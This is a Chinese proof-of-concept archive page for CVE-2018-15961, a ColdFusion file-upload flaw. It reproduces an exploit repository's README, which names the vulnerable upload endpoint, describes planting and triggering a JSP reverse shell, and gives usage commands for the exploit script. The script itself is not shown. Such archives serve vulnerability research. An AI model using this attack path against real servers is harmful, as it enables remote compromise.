支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 58910c15896233e2611895208d5e6b6cd2b72d4d

来源
关联漏洞
标题:Adobe ColdFusion 代码问题漏洞 (CVE-2018-15961)
Description:Adobe ColdFusion是美国奥多比(Adobe)公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在安全漏洞,该漏洞源于程序未限制文件的上传。攻击者可利用该漏洞执行任意代码。以下版本受到影响:Adobe ColdFusion (2018年发布) 2018.0.0.310739版本,ColdFusion (2016年发布)Update 6及之前版本,ColdFusion
Description
Exploit for CVE-2018-15961, a unrestricted file upload vulnerability in Adobe ColdFusion 2018 leading to RCE
介绍
# CVE-2018-15961 - Adobe ColdFusion 2018 RCE

This repository contains my exploit code for the RCE vulnerability in Adobe ColdFusion 2018.

## Exploit Description

The exploit sends a POST request containing a JSP reverse shell to `/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm`. If successfull, this uploads the shell to `/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell.jsp`. The code then triggers to shell by sending a simple GET request.

## Usage

```bash
# Basic usage
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443

# With custom filename for the shell
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443 -f reverse.jsp
```
文件快照

[4.0K] /data/pocs/58910c15896233e2611895208d5e6b6cd2b72d4d ├── [4.5K] coldfusion_rce.py └── [ 725] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。